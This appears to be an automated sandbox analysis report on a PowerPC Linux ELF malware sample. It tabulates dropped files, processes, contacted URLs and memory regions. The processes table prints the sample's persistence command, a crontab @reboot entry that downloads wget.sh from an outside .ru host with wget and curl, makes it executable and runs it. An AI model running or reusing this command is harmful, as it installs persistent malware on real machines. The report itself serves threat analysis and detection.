Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
nshppc.elf
|
ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
|
initial sample
|
||
/var/spool/cron/crontabs/tmp.5oUS4H
|
ASCII text
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
/tmp/nshppc.elf
|
/tmp/nshppc.elf
|
||
/tmp/nshppc.elf
|
-
|
||
/bin/sh
|
sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh;
chmod 777 wget.sh; ./wget.sh\") | crontab -"
|
||
/bin/sh
|
-
|
||
/bin/sh
|
-
|
||
/usr/bin/crontab
|
crontab -l
|
||
/bin/sh
|
-
|
||
/usr/bin/crontab
|
crontab -
|
||
/tmp/nshppc.elf
|
-
|
||
/tmp/nshppc.elf
|
-
|
||
/tmp/nshppc.elf
|
-
|
||
/tmp/nshppc.elf
|
-
|
||
/tmp/nshppc.elf
|
-
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/snapd/snap-failure
|
/usr/lib/snapd/snap-failure snapd
|
||
/usr/lib/snapd/snap-failure
|
-
|
||
/usr/bin/systemctl
|
systemctl stop snapd.socket
|
||
/usr/lib/snapd/snap-failure
|
-
|
There are 8 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://hailcocks.ru/wget.sh;
|
unknown
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7f1240024000
|
page read and write
|
|||
7f124002a000
|
page read and write
|
|||
558c7f2f6000
|
page read and write
|
|||
7f133727c000
|
page read and write
|
|||
7f133727c000
|
page read and write
|
|||
7f1336b4a000
|
page read and write
|
|||
7f1330021000
|
page read and write
|
|||
7f13373a5000
|
page read and write
|
|||
7ffda4422000
|
page read and write
|
|||
7ffda4528000
|
page execute read
|
|||
7f13373ad000
|
page read and write
|
|||
7f1330000000
|
page read and write
|
|||
558c7f06b000
|
page execute read
|
|||
558c8130a000
|
page read and write
|
|||
558c7f2f6000
|
page read and write
|
|||
7f13368bb000
|
page read and write
|
|||
558c812f4000
|
page execute and read and write
|
|||
7f1330000000
|
page read and write
|
|||
7f1240014000
|
page execute read
|
|||
558c7f2ee000
|
page read and write
|
|||
7f13373f2000
|
page read and write
|
|||
7ffda4528000
|
page execute read
|
|||
7f1330021000
|
page read and write
|
|||
7f1240024000
|
page read and write
|
|||
7f13373f2000
|
page read and write
|
|||
7f13373a5000
|
page read and write
|
|||
7f13373ad000
|
page read and write
|
|||
7f13368ad000
|
page read and write
|
|||
558c8130a000
|
page read and write
|
|||
7f1336b4a000
|
page read and write
|
|||
7f124002a000
|
page read and write
|
|||
558c82a6b000
|
page read and write
|
|||
7f1336f31000
|
page read and write
|
|||
558c82a6b000
|
page read and write
|
|||
558c7f2ee000
|
page read and write
|
|||
7f13368bb000
|
page read and write
|
|||
7f1336f0c000
|
page read and write
|
|||
7f13360aa000
|
page read and write
|
|||
7f1240014000
|
page execute read
|
|||
7f13360aa000
|
page read and write
|
|||
7f13368ad000
|
page read and write
|
|||
558c812f4000
|
page execute and read and write
|
|||
7ffda4422000
|
page read and write
|
|||
7f1336f0c000
|
page read and write
|
|||
7f1336f31000
|
page read and write
|
|||
558c7f06b000
|
page execute read
|
There are 36 hidden memdumps, click here to show them.